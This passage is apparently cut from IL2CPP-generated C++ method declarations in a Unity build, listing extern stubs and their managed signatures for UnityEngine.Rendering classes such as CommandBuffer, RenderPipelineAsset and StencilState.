extern void VertexAttributeDescriptor_GetHashCode_mCB8C5F6AD422FE6A410C5406843FCE4B0ED5F2F8 (void);
// 0x000007F2 System.Boolean UnityEngine.Rendering.VertexAttributeDescriptor::Equals(System.Object)
extern void VertexAttributeDescriptor_Equals_m6FBFEE42E1BAAAC2D38434EDF0906C5B76D56BE5 (void);
// 0x000007F3 System.Boolean UnityEngine.Rendering.VertexAttributeDescriptor::Equals(UnityEngine.Rendering.VertexAttributeDescriptor)
extern void VertexAttributeDescriptor_Equals_mF328DE139864C201987238048AC79F8925CA435D (void);
// 0x000007F4 System.Void UnityEngine.Rendering.RenderTargetIdentifier::.ctor(UnityEngine.Rendering.BuiltinRenderTextureType)
extern void RenderTargetIdentifier__ctor_mBB94C5581CCD259EC11AAFA68C151B35E5C72C4F (void);
// 0x000007F5 UnityEngine.Rendering.RenderTargetIdentifier UnityEngine.Rendering.RenderTargetIdentifier::op_Implicit(UnityEngine.Rendering.BuiltinRenderTextureType)
extern void RenderTargetIdentifier_op_Implicit_m4A8EE3AFC545170F3F2215D8DA0F2474B0015CC8 (void);
// 0x000007F6 System.String UnityEngine.Rendering.RenderTargetIdentifier::ToString()
extern void RenderTargetIdentifier_ToString_mA0B5CBC27159C4257939A5CAC6CEACE65AA6D36A (void);
// 0x000007F7 System.Int32 UnityEngine.Rendering.RenderTargetIdentifier::GetHashCode()
extern void RenderTargetIdentifier_GetHashCode_m255E1EFD7BFC22B1B4464F9EF3346386DA328B86 (void);
// 0x000007F8 System.Boolean UnityEngine.Rendering.RenderTargetIdentifier::Equals(UnityEngine.Rendering.RenderTargetIdentifier)
extern void RenderTargetIdentifier_Equals_m859988BBC3D58D5C2AEA18C2CCCAF7009A5499D9 (void);
// 0x000007F9 System.Boolean UnityEngine.Rendering.RenderTargetIdentifier::Equals(System.Object)
extern void RenderTargetIdentifier_Equals_m07E36F91E8966A0E3882EF168F1AE3656BE48E9A (void);
// 0x000007FA System.Boolean UnityEngine.Rendering.GraphicsSettings::get_lightsUseLinearIntensity()
extern void GraphicsSettings_get_lightsUseLinearIntensity_m56A1BD6409AAFD86D7DA0F47FB829CD631D65FCB (void);
// 0x000007FB UnityEngine.ScriptableObject UnityEngine.Rendering.GraphicsSettings::get_INTERNAL_currentRenderPipeline()
extern void GraphicsSettings_get_INTERNAL_currentRenderPipeline_mF43747DB6BEF3FA857B83CD21A543F94F33BDF82 (void);
// 0x000007FC UnityEngine.Rendering.RenderPipelineAsset UnityEngine.Rendering.GraphicsSettings::get_currentRenderPipeline()
extern void GraphicsSettings_get_currentRenderPipeline_m9B5CF917672DCFFD262CC8476FD968DFE910D32F (void);
// 0x000007FD System.Int32 UnityEngine.Rendering.OnDemandRendering::get_renderFrameInterval()
extern void OnDemandRendering_get_renderFrameInterval_mE5574585DE4A02C5A5C0F6770FF86AF1C4F3CCA9 (void);
// 0x000007FE System.Void UnityEngine.Rendering.OnDemandRendering::GetRenderFrameInterval(System.Int32&)
extern void OnDemandRendering_GetRenderFrameInterval_mEE92E09F4366D8D3F2224AB0EBA6F1E57CD13F40 (void);
// 0x000007FF System.Void UnityEngine.Rendering.OnDemandRendering::.cctor()
extern void OnDemandRendering__cctor_mBAE9AC06F698C374E748EF75B23B690656F88A47 (void);
// 0x00000800 System.Void UnityEngine.Rendering.CommandBuffer::SetInvertCulling(System.Boolean)
extern void CommandBuffer_SetInvertCulling_m61EBB9DDA991720ECA8F4856BCC1899E38AA4C1F (void);
// 0x00000801 System.IntPtr UnityEngine.Rendering.CommandBuffer::InitBuffer()
extern void CommandBuffer_InitBuffer_mCD08DF1C752056E84B0DD3073C1D541D6B3ECDB5 (void);
// 0x00000802 System.Void UnityEngine.Rendering.CommandBuffer::ReleaseBuffer()
extern void CommandBuffer_ReleaseBuffer_mF04481C3507E1D69582E220227AB0CA2481F963C (void);
// 0x00000803 System.Void UnityEngine.Rendering.CommandBuffer::set_name(System.String)
extern void CommandBuffer_set_name_mEC83B7FE28D6817A36A8B894A661D6D217488965 (void);
// 0x00000804 System.Void UnityEngine.Rendering.CommandBuffer::Clear()
extern void CommandBuffer_Clear_m4E1272BD1A0C162C9C26434E115279F42FA557C7 (void);
// 0x00000805 System.Void UnityEngine.Rendering.CommandBuffer::Blit_Texture(UnityEngine.Texture,UnityEngine.Rendering.RenderTargetIdentifier&,UnityEngine.Material,System.Int32,UnityEngine.Vector2,UnityEngine.Vector2,System.Int32,System.Int32)
extern void CommandBuffer_Blit_Texture_m8B439BC65FB89C00E4DCE10EF9B92D17C0F8B3D5 (void);
// 0x00000806 System.Void UnityEngine.Rendering.CommandBuffer::ClearRenderTarget(UnityEngine.Rendering.RTClearFlags,UnityEngine.Color,System.Single,System.UInt32)
extern void CommandBuffer_ClearRenderTarget_mF79756BB41395A459CC5FD5CFFC517F65D93D86C (void);
// 0x00000807 System.Void UnityEngine.Rendering.CommandBuffer::ClearRenderTarget(System.Boolean,System.Boolean,UnityEngine.Color)
extern void CommandBuffer_ClearRenderTarget_mABBE498A16DCEADCAA8F5DB50073012F74D03F14 (void);
// 0x00000808 System.Boolean UnityEngine.Rendering.CommandBuffer::ValidateAgainstExecutionFlags(UnityEngine.Rendering.CommandBufferExecutionFlags,UnityEngine.Rendering.CommandBufferExecutionFlags)
extern void CommandBuffer_ValidateAgainstExecutionFlags_mA5F027DDA6B0DCD8BC9AE296C3A6D8E1BD244FEF (void);
// 0x00000809 System.Void UnityEngine.Rendering.CommandBuffer::IssuePluginEventInternal(System.IntPtr,System.Int32)
extern void CommandBuffer_IssuePluginEventInternal_m6D7CD4E8BF37954CA0F317BC118A08362A0E3110 (void);
// 0x0000080A System.Void UnityEngine.Rendering.CommandBuffer::Finalize()
extern void CommandBuffer_Finalize_mF8A454E96E5349AA677FC73CDBECD30DD4F6464D (void);
// 0x0000080B System.Void UnityEngine.Rendering.CommandBuffer::Dispose()
extern void CommandBuffer_Dispose_m9A5E7A3CA09B3E3F9D199FC7C9E7B27CD9CFADF3 (void);
// 0x0000080C System.Void UnityEngine.Rendering.CommandBuffer::Dispose(System.Boolean)
extern void CommandBuffer_Dispose_mE75266209E71214415E356E9D4C8065C7395FB63 (void);
// 0x0000080D System.Void UnityEngine.Rendering.CommandBuffer::.ctor()
extern void CommandBuffer__ctor_m9445F1606331B732FCA393591F3E230714FD5FF4 (void);
// 0x0000080E System.Void UnityEngine.Rendering.CommandBuffer::Blit(UnityEngine.Texture,UnityEngine.Rendering.RenderTargetIdentifier,UnityEngine.Material)
extern void CommandBuffer_Blit_m067EA6B3B00F78DDF43887B565A3208164F84FC3 (void);
// 0x0000080F System.Void UnityEngine.Rendering.CommandBuffer::IssuePluginEvent(System.IntPtr,System.Int32)
extern void CommandBuffer_IssuePluginEvent_mCA87F5D91890B22858471CD3EE0153E3FA1F1E8B (void);
// 0x00000810 System.Void UnityEngine.Rendering.CommandBuffer::Blit_Texture_Injected(UnityEngine.Texture,UnityEngine.Rendering.RenderTargetIdentifier&,UnityEngine.Material,System.Int32,UnityEngine.Vector2&,UnityEngine.Vector2&,System.Int32,System.Int32)
extern void CommandBuffer_Blit_Texture_Injected_m0EF8CBBAE32EE946114C6A5806849C8BBECA528A (void);
// 0x00000811 System.Void UnityEngine.Rendering.CommandBuffer::ClearRenderTarget_Injected(UnityEngine.Rendering.RTClearFlags,UnityEngine.Color&,System.Single,System.UInt32)
extern void CommandBuffer_ClearRenderTarget_Injected_mCE53D6C8193FD6DBE95E276FBA3C230300E37AEF (void);
// 0x00000812 System.Single UnityEngine.Rendering.SphericalHarmonicsL2::get_Item(System.Int32,System.Int32)
extern void SphericalHarmonicsL2_get_Item_m4B9EF62E01AA7FD8A5DEB222618CDA17A7AE5901 (void);
// 0x00000813 System.Int32 UnityEngine.Rendering.SphericalHarmonicsL2::GetHashCode()
extern void SphericalHarmonicsL2_GetHashCode_m6683A29826BFE74740D3CF28227E5C6FC8E6955E (void);
// 0x00000814 System.Boolean UnityEngine.Rendering.SphericalHarmonicsL2::Equals(System.Object)
extern void SphericalHarmonicsL2_Equals_m6B04A0E2E26885F766658AA1A2B0BD2499AA82C6 (void);
// 0x00000815 System.Boolean UnityEngine.Rendering.SphericalHarmonicsL2::Equals(UnityEngine.Rendering.SphericalHarmonicsL2)
extern void SphericalHarmonicsL2_Equals_mA22783D26BEE236A8CA5425305D6772CEA6CCBC8 (void);
// 0x00000816 System.Boolean UnityEngine.Rendering.SphericalHarmonicsL2::op_Equality(UnityEngine.Rendering.SphericalHarmonicsL2,UnityEngine.Rendering.SphericalHarmonicsL2)
extern void SphericalHarmonicsL2_op_Equality_m489FDC880BE49535BCA1A9588BFB6825589498E1 (void);
// 0x00000817 System.Void UnityEngine.Rendering.BatchCullingContext::.ctor(Unity.Collections.NativeArray`1<UnityEngine.Plane>,Unity.Collections.NativeArray`1<UnityEngine.Rendering.BatchVisibility>,Unity.Collections.NativeArray`1<System.Int32>,Unity.Collections.NativeArray`1<System.Int32>,UnityEngine.Rendering.LODParameters,UnityEngine.Matrix4x4,System.Single)
extern void BatchCullingContext__ctor_m4E95A80E46EB29A21AB9AD64C2D1CC5891281449 (void);
// 0x00000818 System.Void UnityEngine.Rendering.BatchRendererGroup::InvokeOnPerformCulling(UnityEngine.Rendering.BatchRendererGroup,UnityEngine.Rendering.BatchRendererCullingOutput&,UnityEngine.Rendering.LODParameters&)
extern void BatchRendererGroup_InvokeOnPerformCulling_m482BDBB3B02D5C2E66A37C1C4F76A1CB933864F8 (void);
// 0x00000819 System.Void UnityEngine.Rendering.BatchRendererGroup/OnPerformCulling::.ctor(System.Object,System.IntPtr)
extern void OnPerformCulling__ctor_mFB91FB8D6D713AC39AFB921AF1C23A50EC80529B (void);
// 0x0000081A Unity.Jobs.JobHandle UnityEngine.Rendering.BatchRendererGroup/OnPerformCulling::Invoke(UnityEngine.Rendering.BatchRendererGroup,UnityEngine.Rendering.BatchCullingContext)
extern void OnPerformCulling_Invoke_mCD3C3FF1DC98173ADA46A711673C69ECAE494F22 (void);
// 0x0000081B System.Boolean UnityEngine.Rendering.LODParameters::Equals(UnityEngine.Rendering.LODParameters)
extern void LODParameters_Equals_mAD45601A9E881620B23A7922D8AA5AFBC91E0B9F (void);
// 0x0000081C System.Boolean UnityEngine.Rendering.LODParameters::Equals(System.Object)
extern void LODParameters_Equals_mF956A067D82497A00AC8234322CD848E6FB7BADE (void);
// 0x0000081D System.Int32 UnityEngine.Rendering.LODParameters::GetHashCode()
extern void LODParameters_GetHashCode_mECFCEAAAC935759A99C30C69BBC99A1148F46F40 (void);
// 0x0000081E System.Void UnityEngine.Rendering.RenderPipeline::Render(UnityEngine.Rendering.ScriptableRenderContext,UnityEngine.Camera[])
// 0x0000081F System.Void UnityEngine.Rendering.RenderPipeline::ProcessRenderRequests(UnityEngine.Rendering.ScriptableRenderContext,UnityEngine.Camera,System.Collections.Generic.List`1<UnityEngine.Camera/RenderRequest>)
extern void RenderPipeline_ProcessRenderRequests_m1303438384D0A5857A147C280A1AF0E16E488908 (void);
// 0x00000820 System.Void UnityEngine.Rendering.RenderPipeline::Render(UnityEngine.Rendering.ScriptableRenderContext,System.Collections.Generic.List`1<UnityEngine.Camera>)
extern void RenderPipeline_Render_m41E15C2221365D92636651792FBDAD1A04E8AF1A (void);
// 0x00000821 System.Void UnityEngine.Rendering.RenderPipeline::InternalRender(UnityEngine.Rendering.ScriptableRenderContext,System.Collections.Generic.List`1<UnityEngine.Camera>)
extern void RenderPipeline_InternalRender_mCB77395158F4572F348D8227BA9127ABF1C9C5BE (void);
// 0x00000822 System.Void UnityEngine.Rendering.RenderPipeline::InternalRenderWithRequests(UnityEngine.Rendering.ScriptableRenderContext,System.Collections.Generic.List`1<UnityEngine.Camera>,System.Collections.Generic.List`1<UnityEngine.Camera/RenderRequest>)
extern void RenderPipeline_InternalRenderWithRequests_mA4E809CF43979778D7F5048F79BF506746E82B57 (void);
// 0x00000823 System.Boolean UnityEngine.Rendering.RenderPipeline::get_disposed()
extern void RenderPipeline_get_disposed_mF0D4B88DF44249E0FC2371697B913DD5A81B3850 (void);
// 0x00000824 System.Void UnityEngine.Rendering.RenderPipeline::set_disposed(System.Boolean)
extern void RenderPipeline_set_disposed_mB7EC4BD04C80015CBCC0B92A65A6DE615F2828A8 (void);
// 0x00000825 System.Void UnityEngine.Rendering.RenderPipeline::Dispose()
extern void RenderPipeline_Dispose_mDF8A62A6B7D3A00128C9341921C036D015C41179 (void);
// 0x00000826 System.Void UnityEngine.Rendering.RenderPipeline::Dispose(System.Boolean)
extern void RenderPipeline_Dispose_m581E2B33EF0CCAF2C3E7BD71AE32B4974D259286 (void);
// 0x00000827 UnityEngine.Rendering.RenderPipeline UnityEngine.Rendering.RenderPipelineAsset::InternalCreatePipeline()
extern void RenderPipelineAsset_InternalCreatePipeline_m662E6A3D3B14C19D5318E172A4AF81FEF71C6252 (void);
// 0x00000828 System.String[] UnityEngine.Rendering.RenderPipelineAsset::get_renderingLayerMaskNames()
extern void RenderPipelineAsset_get_renderingLayerMaskNames_mC0978F38B2EADD1462593AC6D8395E612CB1329D (void);
// 0x00000829 System.String[] UnityEngine.Rendering.RenderPipelineAsset::get_prefixedRenderingLayerMaskNames()
extern void RenderPipelineAsset_get_prefixedRenderingLayerMaskNames_m89254E02D74CC6FC9320104B8A1748534FE55F6B (void);
// 0x0000082A UnityEngine.Material UnityEngine.Rendering.RenderPipelineAsset::get_defaultMaterial()
extern void RenderPipelineAsset_get_defaultMaterial_mCF112570E7B47208A0B700BA97B33CAE6713D323 (void);
// 0x0000082B UnityEngine.Shader UnityEngine.Rendering.RenderPipelineAsset::get_autodeskInteractiveShader()
extern void RenderPipelineAsset_get_autodeskInteractiveShader_m261A0788B4F73AFC5A50953878552BC3BFF8B674 (void);
// 0x0000082C UnityEngine.Shader UnityEngine.Rendering.RenderPipelineAsset::get_autodeskInteractiveTransparentShader()
extern void RenderPipelineAsset_get_autodeskInteractiveTransparentShader_m6E2A2439FCB378F64DC46CB6DB517A1661A306F8 (void);
// 0x0000082D UnityEngine.Shader UnityEngine.Rendering.RenderPipelineAsset::get_autodeskInteractiveMaskedShader()
extern void RenderPipelineAsset_get_autodeskInteractiveMaskedShader_m42DB9A70B290E217B91616E9274C9B7E58D54362 (void);
// 0x0000082E UnityEngine.Shader UnityEngine.Rendering.RenderPipelineAsset::get_terrainDetailLitShader()
extern void RenderPipelineAsset_get_terrainDetailLitShader_m74F2FA112CD18493E7003F6F711AA09A8C930136 (void);
// 0x0000082F UnityEngine.Shader UnityEngine.Rendering.RenderPipelineAsset::get_terrainDetailGrassShader()
extern void RenderPipelineAsset_get_terrainDetailGrassShader_mBE126045BF9048B59CE56D1BD9C69C3DEB4CDD96 (void);
// 0x00000830 UnityEngine.Shader UnityEngine.Rendering.RenderPipelineAsset::get_terrainDetailGrassBillboardShader()
extern void RenderPipelineAsset_get_terrainDetailGrassBillboardShader_mE233539926B92ADB7A057C34CBCD7E51823C75A2 (void);
// 0x00000831 UnityEngine.Material UnityEngine.Rendering.RenderPipelineAsset::get_defaultParticleMaterial()
extern void RenderPipelineAsset_get_defaultParticleMaterial_mC68CA6787815E00CF501F268F34DA0B3C83B3013 (void);
// 0x00000832 UnityEngine.Material UnityEngine.Rendering.RenderPipelineAsset::get_defaultLineMaterial()
extern void RenderPipelineAsset_get_defaultLineMaterial_mB4DD122B043417F3810FEAAA74E79B369A26B484 (void);
// 0x00000833 UnityEngine.Material UnityEngine.Rendering.RenderPipelineAsset::get_defaultTerrainMaterial()
extern void RenderPipelineAsset_get_defaultTerrainMaterial_m129D75CFE9689112452AA911C24BEE4939ADB520 (void);
// 0x00000834 UnityEngine.Material UnityEngine.Rendering.RenderPipelineAsset::get_defaultUIMaterial()
extern void RenderPipelineAsset_get_defaultUIMaterial_mBB9F6694EEEB97AC6140C094A48743660A0DAF04 (void);
// 0x00000835 UnityEngine.Material UnityEngine.Rendering.RenderPipelineAsset::get_defaultUIOverdrawMaterial()
extern void RenderPipelineAsset_get_defaultUIOverdrawMaterial_m19832E76629C0AFC18F0D61C5C1CC47533200038 (void);
// 0x00000836 UnityEngine.Material UnityEngine.Rendering.RenderPipelineAsset::get_defaultUIETC1SupportedMaterial()
extern void RenderPipelineAsset_get_defaultUIETC1SupportedMaterial_m2D1DC4B89F59283C8AE3101F3DC05D88C10D4C10 (void);
// 0x00000837 UnityEngine.Material UnityEngine.Rendering.RenderPipelineAsset::get_default2DMaterial()
extern void RenderPipelineAsset_get_default2DMaterial_m2418C7E1A0974B2A06CF3BE81590C7B0DF1DB113 (void);
// 0x00000838 UnityEngine.Material UnityEngine.Rendering.RenderPipelineAsset::get_default2DMaskMaterial()
extern void RenderPipelineAsset_get_default2DMaskMaterial_mEE67105F80768BDFD1C93E8709FEBF2D4561E14E (void);
// 0x00000839 UnityEngine.Shader UnityEngine.Rendering.RenderPipelineAsset::get_defaultShader()
extern void RenderPipelineAsset_get_defaultShader_m633AD6A97B2D1D436E42920D766B1283C1FED858 (void);
// 0x0000083A UnityEngine.Shader UnityEngine.Rendering.RenderPipelineAsset::get_defaultSpeedTree7Shader()
extern void RenderPipelineAsset_get_defaultSpeedTree7Shader_mCEF3795C9E36F0A9D9A3CE29824790B172637252 (void);
// 0x0000083B UnityEngine.Shader UnityEngine.Rendering.RenderPipelineAsset::get_defaultSpeedTree8Shader()
extern void RenderPipelineAsset_get_defaultSpeedTree8Shader_mAEB3D02FC0A0016BAC5C22BC1967827403E5C17A (void);
// 0x0000083C UnityEngine.Rendering.RenderPipeline UnityEngine.Rendering.RenderPipelineAsset::CreatePipeline()
// 0x0000083D System.Void UnityEngine.Rendering.RenderPipelineAsset::OnValidate()
extern void RenderPipelineAsset_OnValidate_mD160C7BDEA559BAF3DDA48B4819307E07B377F52 (void);
// 0x0000083E System.Void UnityEngine.Rendering.RenderPipelineAsset::OnDisable()
extern void RenderPipelineAsset_OnDisable_mE99CEED707BDC901AD37DC976FA3A3A313E7E00C (void);
// 0x0000083F System.Void UnityEngine.Rendering.RenderPipelineAsset::.ctor()
extern void RenderPipelineAsset__ctor_mC45BECAED54BEDC4555AF010323EABF49BA7B78A (void);
// 0x00000840 UnityEngine.Rendering.RenderPipeline UnityEngine.Rendering.RenderPipelineManager::get_currentPipeline()
extern void RenderPipelineManager_get_currentPipeline_m1907912AEAFDF9E549FCE397178EFE93D4691760 (void);
// 0x00000841 System.Void UnityEngine.Rendering.RenderPipelineManager::set_currentPipeline(UnityEngine.Rendering.RenderPipeline)
extern void RenderPipelineManager_set_currentPipeline_m58F8CDDA2C8A138F355F7672BE5382C62D2C55DF (void);
// 0x00000842 System.Void UnityEngine.Rendering.RenderPipelineManager::OnActiveRenderPipelineTypeChanged()
extern void RenderPipelineManager_OnActiveRenderPipelineTypeChanged_mC5AC4C431D84C5F030CA2DF6B46C19EFA87E92EA (void);
// 0x00000843 System.Void UnityEngine.Rendering.RenderPipelineManager::HandleRenderPipelineChange(UnityEngine.Rendering.RenderPipelineAsset)
extern void RenderPipelineManager_HandleRenderPipelineChange_m89D456720172AE19FEABD43C870EE06BA6FFE885 (void);
// 0x00000844 System.Void UnityEngine.Rendering.RenderPipelineManager::CleanupRenderPipeline()
extern void RenderPipelineManager_CleanupRenderPipeline_m6FF252A0C2CFDEDFB4A5B5EF33B86B5EDFBAFD2E (void);
// 0x00000845 System.String UnityEngine.Rendering.RenderPipelineManager::GetCurrentPipelineAssetType()
extern void RenderPipelineManager_GetCurrentPipelineAssetType_mD70AE9CC75AF741F336A494688F69B9AC666123C (void);
// 0x00000846 System.Void UnityEngine.Rendering.RenderPipelineManager::DoRenderLoop_Internal(UnityEngine.Rendering.RenderPipelineAsset,System.IntPtr,System.Collections.Generic.List`1<UnityEngine.Camera/RenderRequest>)
extern void RenderPipelineManager_DoRenderLoop_Internal_m7FB9F81FF54E716454A4888990CE46220DBAD6CC (void);
// 0x00000847 System.Void UnityEngine.Rendering.RenderPipelineManager::PrepareRenderPipeline(UnityEngine.Rendering.RenderPipelineAsset)
extern void RenderPipelineManager_PrepareRenderPipeline_m399F65B962C902B1FFC331294E3CA4C469BDC063 (void);
// 0x00000848 System.Void UnityEngine.Rendering.RenderPipelineManager::.cctor()
extern void RenderPipelineManager__cctor_mE2CB9B1D60D04CAEEBC0130E5B99644870F90BF4 (void);
// 0x00000849 System.Void UnityEngine.Rendering.ScriptableRenderContext::GetCameras_Internal(System.Type,System.Object)
extern void ScriptableRenderContext_GetCameras_Internal_m852016B3544E3ED5FEFB9695EC175622A5B6A8C8 (void);
// 0x0000084A System.Void UnityEngine.Rendering.ScriptableRenderContext::.ctor(System.IntPtr)
extern void ScriptableRenderContext__ctor_m10159F14BB69F555C375E13BB77A1898FDB42FA5 (void);
// 0x0000084B System.Void UnityEngine.Rendering.ScriptableRenderContext::GetCameras(System.Collections.Generic.List`1<UnityEngine.Camera>)
extern void ScriptableRenderContext_GetCameras_m9B2329F79132EE49B719560AD739FD3601C44189 (void);
// 0x0000084C System.Boolean UnityEngine.Rendering.ScriptableRenderContext::Equals(UnityEngine.Rendering.ScriptableRenderContext)
extern void ScriptableRenderContext_Equals_mBFDA5815F2B6ABA9B16503DA906B8BA42078718D (void);
// 0x0000084D System.Boolean UnityEngine.Rendering.ScriptableRenderContext::Equals(System.Object)
extern void ScriptableRenderContext_Equals_m99E5A233945DFC3B9A786F2413ECE68E5019AB88 (void);
// 0x0000084E System.Int32 UnityEngine.Rendering.ScriptableRenderContext::GetHashCode()
extern void ScriptableRenderContext_GetHashCode_mA1EE09239F1ACFC29A2ADB027D5E76E690510207 (void);
// 0x0000084F System.Void UnityEngine.Rendering.ScriptableRenderContext::.cctor()
extern void ScriptableRenderContext__cctor_mC3B278224EBBC167C90B484295DB8563BED64D6F (void);
// 0x00000850 System.Void UnityEngine.Rendering.ScriptableRenderContext::GetCameras_Internal_Injected(UnityEngine.Rendering.ScriptableRenderContext&,System.Type,System.Object)
extern void ScriptableRenderContext_GetCameras_Internal_Injected_mE2D2D9C806F8AEC694BF42009B6878765F6A28FE (void);
// 0x00000851 System.Void UnityEngine.Rendering.ShaderTagId::.ctor(System.String)
extern void ShaderTagId__ctor_m4191968F1D2CE19F9092253EC10F83734A9CFF5B (void);
// 0x00000852 System.Boolean UnityEngine.Rendering.ShaderTagId::Equals(System.Object)
extern void ShaderTagId_Equals_m02826F7AFC63AA3AE5DB14F7A891F8F173FD9A33 (void);
// 0x00000853 System.Boolean UnityEngine.Rendering.ShaderTagId::Equals(UnityEngine.Rendering.ShaderTagId)
extern void ShaderTagId_Equals_m932EFCC38C276EEB2784BBC866330F4C595F52E0 (void);
// 0x00000854 System.Int32 UnityEngine.Rendering.ShaderTagId::GetHashCode()
extern void ShaderTagId_GetHashCode_mF5E3A1F96CBDFDCEFABE1B56125EBBA6E3B9EFEF (void);
// 0x00000855 System.Void UnityEngine.Rendering.StencilState::set_enabled(System.Boolean)
extern void StencilState_set_enabled_m6DC861C699D1044E896E833D2DAE69B82F796564 (void);
// 0x00000856 System.Void UnityEngine.Rendering.StencilState::set_readMask(System.Byte)
extern void StencilState_set_readMask_m1BA8F9033413889D4E77DA343DC0029566A9BB9B (void);
// 0x00000857 System.Void UnityEngine.Rendering.StencilState::set_writeMask(System.Byte)
extern void StencilState_set_writeMask_m94471C671E03D42F36DA61436B1068B362375D65 (void);
// 0x00000858 System.Void UnityEngine.Rendering.StencilState::set_compareFunctionFront(UnityEngine.Rendering.CompareFunction)
extern void StencilState_set_compareFunctionFront_m1388C37901DAB6AF9D23C0F01946DCCE19BC9BFC (void);
// 0x00000859 System.Void UnityEngine.Rendering.StencilState::set_passOperationFront(UnityEngine.Rendering.StencilOp)
extern void StencilState_set_passOperationFront_m1F15CC29366DAEAA6CCE1DB0622C70D6ECC5A3EB (void);
// 0x0000085A System.Void UnityEngine.Rendering.StencilState::set_failOperationFront(UnityEngine.Rendering.StencilOp)
extern void StencilState_set_failOperationFront_mADCECAE5D2E75ABAE51650F1F314E661D09C2CD6 (void);
// 0x0000085B System.Void UnityEngine.Rendering.StencilState::set_zFailOperationFront(UnityEngine.Rendering.StencilOp)
extern void StencilState_set_zFailOperationFront_mC7D8F0A08B9AEC4203BD6B352CB795E8011EFBB6 (void);
// 0x0000085C System.Void UnityEngine.Rendering.StencilState::set_compareFunctionBack(UnityEngine.Rendering.CompareFunction)
extern void StencilState_set_compareFunctionBack_m8AF73F4E8FC95A46D33E3192C50702D2AA15D61D (void);
// 0x0000085D System.Void UnityEngine.Rendering.StencilState::set_passOperationBack(UnityEngine.Rendering.StencilOp)
extern void StencilState_set_passOperationBack_m4B1395FE21F5B5C809DC6F31D5824A90E05ED220 (void);
// 0x0000085E System.Void UnityEngine.Rendering.StencilState::set_failOperationBack(UnityEngine.Rendering.StencilOp)
extern void StencilState_set_failOperationBack_mD279271DD1F99EE5B8BC19F5AE60988E6C6F0E4A (void);
// 0x0000085F System.Void UnityEngine.Rendering.StencilState::set_zFailOperationBack(UnityEngine.Rendering.StencilOp)
extern void StencilState_set_zFailOperationBack_mC092ABD8A5EA87245640A10E54C6A1990C4F6864 (void);
// 0x00000860 System.Boolean UnityEngine.Rendering.StencilState::Equals(UnityEngine.Rendering.StencilState)
extern void StencilState_Equals_m9FFB8A41D8838FD128875CB2D4DAA760C6DF1051 (void);
// 0x00000861 System.Boolean UnityEngine.Rendering.StencilState::Equals(System.Object)
extern void StencilState_Equals_mEA45A5D2BF2223B15EE0FB8BCEDBA9CB534ADF4B (void);
// 0x00000862 System.Int32 UnityEngine.Rendering.StencilState::GetHashCode()
extern void StencilState_GetHashCode_mB4A02DEE780377C853D16FFF49CCB9D9F4F711A5 (void);
// 0x00000863 UnityEngine.Rendering.SupportedRenderingFeatures UnityEngine.Rendering.SupportedRenderingFeatures::get_active()
extern void SupportedRenderingFeatures_get_active_mEE06ADFCF05E5111ED1D42BA3E893F8386C96480 (void);
// 0x00000864 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::set_active(UnityEngine.Rendering.SupportedRenderingFeatures)
extern void SupportedRenderingFeatures_set_active_m3AC4375082D83077EB449AD20EC27B6B458D2EC4 (void);
// 0x00000865 UnityEngine.Rendering.SupportedRenderingFeatures/LightmapMixedBakeModes UnityEngine.Rendering.SupportedRenderingFeatures::get_defaultMixedLightingModes()
extern void SupportedRenderingFeatures_get_defaultMixedLightingModes_m7F9FDF9012EC41E36466613C8A9103D74666CBC4 (void);
// 0x00000866 UnityEngine.Rendering.SupportedRenderingFeatures/LightmapMixedBakeModes UnityEngine.Rendering.SupportedRenderingFeatures::get_mixedLightingModes()
extern void SupportedRenderingFeatures_get_mixedLightingModes_m929C0CE80A4990993EBCAB8B46C1E273A0829137 (void);
// 0x00000867 UnityEngine.LightmapBakeType UnityEngine.Rendering.SupportedRenderingFeatures::get_lightmapBakeTypes()
extern void SupportedRenderingFeatures_get_lightmapBakeTypes_m1311A5AD5BE1A6BA3251238C893D7D340358C156 (void);
// 0x00000868 UnityEngine.LightmapsMode UnityEngine.Rendering.SupportedRenderingFeatures::get_lightmapsModes()
extern void SupportedRenderingFeatures_get_lightmapsModes_m925D670110EF7109A26BE1B228066E1201FAAE38 (void);
// 0x00000869 System.Boolean UnityEngine.Rendering.SupportedRenderingFeatures::get_enlightenLightmapper()
extern void SupportedRenderingFeatures_get_enlightenLightmapper_mF7C756BBD4E605DD047BD502DFF8569C4CEE8F27 (void);
// 0x0000086A System.Boolean UnityEngine.Rendering.SupportedRenderingFeatures::get_enlighten()
extern void SupportedRenderingFeatures_get_enlighten_m6F973FEB7CCF0BB1B7A2F25317EADC5F6FD95ED6 (void);
// 0x0000086B System.Boolean UnityEngine.Rendering.SupportedRenderingFeatures::get_rendersUIOverlay()
extern void SupportedRenderingFeatures_get_rendersUIOverlay_m657FFFC5B360F7BCE9964EF50E7449779224AEFC (void);
// 0x0000086C System.Boolean UnityEngine.Rendering.SupportedRenderingFeatures::get_autoAmbientProbeBaking()
extern void SupportedRenderingFeatures_get_autoAmbientProbeBaking_m42E98E922511B1CF790FC414C9A85D70DFACA2C8 (void);
// 0x0000086D System.Boolean UnityEngine.Rendering.SupportedRenderingFeatures::get_autoDefaultReflectionProbeBaking()
extern void SupportedRenderingFeatures_get_autoDefaultReflectionProbeBaking_mFDB934E6645FA5CA95E1F0BEF4A12345A1025207 (void);
// 0x0000086E System.Void UnityEngine.Rendering.SupportedRenderingFeatures::FallbackMixedLightingModeByRef(System.IntPtr)
extern void SupportedRenderingFeatures_FallbackMixedLightingModeByRef_m79883C2C0259DA7AF9B43DC1C6621EF8C2C882AB (void);
// 0x0000086F System.Boolean UnityEngine.Rendering.SupportedRenderingFeatures::IsMixedLightingModeSupported(UnityEngine.MixedLightingMode)
extern void SupportedRenderingFeatures_IsMixedLightingModeSupported_m1FAB223D6188E1830288D98A7622B549F545881A (void);
// 0x00000870 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::IsMixedLightingModeSupportedByRef(UnityEngine.MixedLightingMode,System.IntPtr)
extern void SupportedRenderingFeatures_IsMixedLightingModeSupportedByRef_mF97CED14CB16F3193BCB30A9A37F7B8EDFB7AC4D (void);
// 0x00000871 System.Boolean UnityEngine.Rendering.SupportedRenderingFeatures::IsLightmapBakeTypeSupported(UnityEngine.LightmapBakeType)
extern void SupportedRenderingFeatures_IsLightmapBakeTypeSupported_mCBE5A13BA92867DA66DCDF23121473FD4B879CA4 (void);
// 0x00000872 System.Void UnityEngine.Rendering.SupportedRenderingFeatures::IsLightmapBakeTypeSupportedByRef(UnityEngine.LightmapBakeType,System.IntPtr)
extern void SupportedRenderingFeatures_IsLightmapBakeTypeSupportedByRef_mC712C491E3596EE8C0655538CF08E042EB7B34C8 (void);
